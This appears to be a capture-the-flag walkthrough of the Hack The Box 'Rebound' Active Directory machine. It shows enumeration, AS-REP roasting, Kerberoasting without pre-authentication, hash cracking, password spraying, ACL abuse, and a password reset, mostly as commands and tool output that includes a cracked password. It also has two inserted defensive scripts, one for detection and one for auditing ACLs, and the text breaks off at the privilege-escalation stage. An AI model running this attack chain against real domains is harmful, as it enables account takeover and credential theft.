# Rebound

## Enumeration

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time: 
|   date: 2023-12-24T11:28:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds
```

Enumerating SMB and LDAP yielded nothing. However, I was able to connect to SMB unauthenticated (as `Guest` with an empty password) using **rpcclient**, so I proceeded to enumerate potential users with [RID cycling](https://www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack).

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''    
SMB         10.10.11.231    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\Guest:
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...
```

I then tried AS-REP roasting, hoping for a quick win for initial access, but could not crack the hash, which probably meant this was not the intended path.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
```

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%

Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023
```

After a very long time, I stumbled across [this article](https://www.horizon3.ai/from-cve-2022-33679-to-unauthenticated-kerberoasting/) about Kerberoasting without pre-authentication. Similar to AS-REP roasting, the technique needs two things, both of which we already have:

* [x] A user account with pre-authentication disabled (we have the user account `jjones`)
* [x] One or more valid accounts to target as service accounts (we have a list of users in the domain)
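As an added defender-side example (not part of the original write-up), the following script classifies Windows Security event 4768 records to surface both techniques above: AS-REP roasting (pre-auth type 0 with an RC4 ticket) and pre-auth-less Kerberoasting, where the AS-REQ names another account instead of `krbtgt` as the service. The JSON field names and the sample events are assumptions constructed here.

```python
"""Spot AS-REP roasting and pre-auth-less Kerberoasting in Windows event 4768.

Added example, not part of the original write-up. It assumes 4768 ("A Kerberos
authentication ticket (TGT) was requested") events exported as JSON with the
field names below; adjust them to your SIEM's schema.
"""
import json
from collections import defaultdict

KRBTGT = "krbtgt"
PREAUTH_NONE = "0"        # PreAuthType 0: logon without pre-authentication
RC4_HMAC = "0x17"         # TicketEncryptionType 0x17: RC4, the crackable etype

# Constructed sample events (not real telemetry). Account names mirror the
# write-up's domain; client IPs and everything else are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "ppaul", "ServiceName": "krbtgt", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jjones", "ServiceName": "krbtgt", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.16.17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jjones", "ServiceName": "ldap_monitor", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.16.17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jjones", "ServiceName": "delegator$", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.16.17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "tbrady", "ServiceName": "krbtgt", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5", "Status": "0x0"},
]


def classify_event(ev):
    """Return a list of finding tags for one 4768 record."""
    findings = []
    if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
        return findings                      # only successful AS-REQ responses matter here
    sname = ev.get("ServiceName", "").lower()
    if ev.get("PreAuthType") == PREAUTH_NONE:
        if sname != KRBTGT:
            # The AS-REQ asked for a ticket to another account instead of a TGT:
            # the pre-auth-less Kerberoast described in the write-up
            findings.append("kerberoast-without-preauth")
        elif ev.get("TicketEncryptionType") == RC4_HMAC:
            findings.append("asrep-roast")   # RC4 TGT for a pre-auth-less account
    return findings


def analyze(events, burst_threshold=2):
    """Classify every event and summarise bursts per client IP.

    Returns (findings, bursts): findings is a list of (ip, requester, sname, tag);
    bursts maps ip -> set of targeted accounts for IPs that hit >= threshold."""
    findings = []
    targets_by_ip = defaultdict(set)
    for ev in events:
        for tag in classify_event(ev):
            ip = ev.get("IpAddress", "?")
            findings.append((ip, ev["TargetUserName"], ev["ServiceName"], tag))
            if tag == "kerberoast-without-preauth":
                targets_by_ip[ip].add(ev["ServiceName"])
    bursts = {ip: t for ip, t in targets_by_ip.items() if len(t) >= burst_threshold}
    return findings, bursts


def analyze_json_lines(text, **kw):
    """Same as analyze() for a newline-delimited JSON export."""
    return analyze([json.loads(line) for line in text.splitlines() if line.strip()], **kw)


if __name__ == "__main__":
    found, bursts = analyze(SAMPLE_EVENTS)
    for ip, who, sname, tag in found:
        print(f"{tag:26} from {ip:12} requester={who:14} sname={sname}")
    for ip, names in bursts.items():
        print(f"burst: {ip} requested tickets for {sorted(names)} without pre-auth")
```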

To keep myself sane after all the impacket branch errors I was receiving, I decided to use a Windows VM and perform the attack with Rubeus and its `/nopreauth` parameter.

```bash
PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones"  /spns:C:\Users\nicholas\Desktop\users.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.1


[*] Action: Kerberoasting

[*] Using jjones without pre-auth to request service tickets

[*] Target SPN             : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31
```

We can now crack these hashes with hashcat and rockyou (mode 13100, Kerberos 5 TGS-REP etype 23), which gives us the password of `ldap_monitor`.

```bash
PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 333 MB

Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19a                                                                                                           a1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2b                                                                                                           be8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee621                                                                                                           1aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534                                                                                                           499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27f                                                                                                           fac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3                                                                                                           325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211df                                                                                                           fb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df9                                                                                                           
9423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8d                                                                                                           da59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e3                                                                                                           39071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c502                                                                                                           2d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499                                                                                                           997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dca                                                                                                           a15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a4                                                                                                           4cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1G                                                                                                           GR8t@$$4u

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16

Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024
```

## Initial Foothold

After obtaining domain credentials, I mapped the domain with BloodHound and found a route for lateral movement to user access, though not from the accounts we currently have.

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2FtuUdq0xB7nahJfW7h9Ha%2Fimage.png?alt=media&#x26;token=4b69dc19-b68d-47e6-8776-d150ab1ba5d9" alt=""><figcaption><p><strong>A path to user maybe?</strong></p></figcaption></figure>

From the graph above, our main goal is either to

1. Obtain either the PPAUL or the FFLOCK user account, OR
2. Enroll ourselves as a group member of SERVICEMGMT somehow

**Obtain either PPAUL or FFLOCK user account**

Using the password obtained from the `ldap_monitor` account, I performed password spraying with crackmapexec and got a match on the user `oorend`.

```bash
┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/impacket-master]
└─$ crackmapexec smb rebound.htb -u ../users.lst -p '1GR8t@$$4u' --continue-on-success
SMB         dc01.rebound.htb 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE 

```

Sadly, the password spray did not work on either PPAUL or FFLOCK.

**Enroll ourselves as a group member of SERVICEMGMT somehow**

I then remembered that some ACL permissions are not shown in BloodHound and must be enumerated explicitly using something like PowerView's `FindDomainObjectAcl`. However, I kept receiving the error `Server not operational`.

I then struggled to find a Linux alternative until I finally stumbled across impacket's `dacledit`, which lets me check whether the principal `oorend` has any permissions over the target `SERVICEMGMT` group.

```bash
┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 ./dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps  -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


[-] CCache file is not found. Skipping...
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*]   ACE[2] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : Self (0x8)
[*]     Trustee (SID)             : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
```

Success! We know that `oorend` has the `Self` right on the group, meaning he can add himself as a member of `SERVICEMGMT`.
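An added example (not code from the write-up or from impacket) that decodes ACE access masks like the `Self (0x8)` above and the `FullControl` mask dacledit writes, and flags ACEs that hand control of a group, OU or user to a non-privileged trustee; the ACE records are constructed here, with `oorend`'s SID taken from the dacledit output and the SERVICEMGMT SID a placeholder.

```python
"""Decode Active Directory ACE access masks and flag ACEs that hand control of
a group, OU or user to a non-privileged trustee.

Added example, not code from the write-up or from impacket. The ACE records
below are constructed; a real audit would read each object's
nTSecurityDescriptor (for example via LDAP) and feed its ACEs to audit().
"""

# ADS_RIGHTS_ENUM bits plus the standard rights, as they appear in an ACE mask
ADS_RIGHTS = [
    (0x00000001, "CreateChild"),   (0x00000002, "DeleteChild"),
    (0x00000004, "ListChildren"),  (0x00000008, "Self"),   # validated write, e.g. add self to group
    (0x00000010, "ReadProperty"),  (0x00000020, "WriteProperty"),
    (0x00000040, "DeleteTree"),    (0x00000080, "ListObject"),
    (0x00000100, "ControlAccess"), (0x00010000, "Delete"),
    (0x00020000, "ReadControl"),   (0x00040000, "WriteDacl"),
    (0x00080000, "WriteOwner"),    (0x10000000, "GenericAll"),
    (0x20000000, "GenericExecute"), (0x40000000, "GenericWrite"),
    (0x80000000, "GenericRead"),
]
FULL_CONTROL = 0x000F01FF   # all specific + standard rights; what dacledit calls "FullControl"
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"   # schema GUID of the member attribute

# Rights that let a trustee take over an object, by object class
TAKEOVER = {
    "group": {"Self", "WriteProperty", "WriteDacl", "WriteOwner",
              "GenericWrite", "GenericAll", "FullControl"},
    "organizationalUnit": {"CreateChild", "WriteDacl", "WriteOwner",
                           "GenericAll", "FullControl"},
    "user": {"WriteProperty", "ControlAccess", "WriteDacl", "WriteOwner",
             "GenericWrite", "GenericAll", "FullControl"},
}
# Trustees expected to hold such rights: BUILTIN\Administrators, SYSTEM
PRIVILEGED_SIDS = {"S-1-5-32-544", "S-1-5-18"}


def decode_mask(mask):
    """Translate an access mask into right names, e.g. 0x8 -> ['Self']."""
    names = [name for bit, name in ADS_RIGHTS if mask & bit]
    if mask & FULL_CONTROL == FULL_CONTROL:
        names.append("FullControl")
    return names


def audit(aces):
    """Return [(trustee, target, sorted risky rights)] for allow-ACEs granting take-over.

    Each ACE is a dict: trustee, trustee_sid, target, object_class, mask, and
    object_type (attribute/extended-right GUID the ACE is scoped to, or None)."""
    findings = []
    for ace in aces:
        if ace["trustee_sid"] in PRIVILEGED_SIDS or ace.get("type", "allow") != "allow":
            continue
        rights = set(decode_mask(ace["mask"]))
        # A property write scoped to some attribute other than `member` does not
        # by itself give group control, so do not count it as Self/WriteProperty
        if ace.get("object_type") and ace["object_type"] != MEMBER_ATTR_GUID:
            rights -= {"WriteProperty", "Self"}
        risky = sorted(rights & TAKEOVER.get(ace["object_class"], set()))
        if risky:
            findings.append((ace["trustee"], ace["target"], risky))
    return findings


# Constructed sample: oorend's SID is the one dacledit printed; the SERVICEMGMT
# SID and the attribute GUID of the last ACE are placeholders.
OOREND_SID = "S-1-5-21-4078382237-1492182817-2568127209-7682"
SERVICEMGMT_DN = "CN=SERVICEMGMT,CN=Users,DC=rebound,DC=htb"
SERVICE_USERS_OU = "OU=SERVICE USERS,DC=rebound,DC=htb"
SAMPLE_ACES = [
    {"trustee": "Authenticated Users", "trustee_sid": "S-1-5-11", "target": SERVICEMGMT_DN,
     "object_class": "group", "mask": 0x20094, "object_type": None},          # read-only rights
    {"trustee": "oorend", "trustee_sid": OOREND_SID, "target": SERVICEMGMT_DN,
     "object_class": "group", "mask": 0x8, "object_type": None},              # Self
    {"trustee": "SERVICEMGMT", "trustee_sid": "S-1-5-21-0-0-0-PLACEHOLDER", "target": SERVICE_USERS_OU,
     "object_class": "organizationalUnit", "mask": 0x10000000, "object_type": None},  # GenericAll
    {"trustee": "Administrators", "trustee_sid": "S-1-5-32-544", "target": SERVICE_USERS_OU,
     "object_class": "organizationalUnit", "mask": FULL_CONTROL, "object_type": None},
    {"trustee": "oorend", "trustee_sid": OOREND_SID, "target": "CN=winrm_svc," + SERVICE_USERS_OU,
     "object_class": "user", "mask": 0x20, "object_type": "placeholder-attribute-guid"},
]

if __name__ == "__main__":
    for trustee, target, risky in audit(SAMPLE_ACES):
        print(f"{trustee} -> {target}: {', '.join(risky)}")
```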

We can easily do that using [bloodyAD's `AddGroupMember`](https://www.thehacker.recipes/ad/movement/dacl/grant-rights) functionality.

```bash
─[sg-free-1]─[10.10.14.122]─[NicholasSoh@htb-x8h8zosurg]─[~/Desktop]
└──╼ [★]$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB
```

Referencing the BloodHound graph earlier, the `SERVICEMGMT` group has `GenericAll` (Full Control) over the OU `SERVICE USERS`.

Once again, we can use impacket's `dacledit`, this time to grant `oorend` full control over that OU.

```bash
┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB'  rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!

```

As `oorend`, we now have full control over the OU `Service Users` and, through inheritance, over `winrm_svc`.

We can now change the password of `winrm_svc` using `rpcclient` (`setuserinfo2` with level 23) and then PS-Remote in to get the user flag.

```bash
└─$ rpcclient -U  rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $> 

```

## Privilege Escalation

Using `query user`, we see that the user `tbrady` is logged on.

```bash
PS C:\Users\winrm_svc>
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 tbrady                console             1  Active      none   25/11/2023 8:24 AM

```

For some reason, the same command no longer gives me this output as of 20/1/2024.

```bash
PS C:\Users\winrm_svc\Documents> query user
No User exists for *
```

From here, we can use [RemotePotato0](https://github.com/antonioCoco/RemotePotato0), which lets us capture the NTLMv2 hash of any user with an interactive session on the target machine, in this case `tbrady`.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
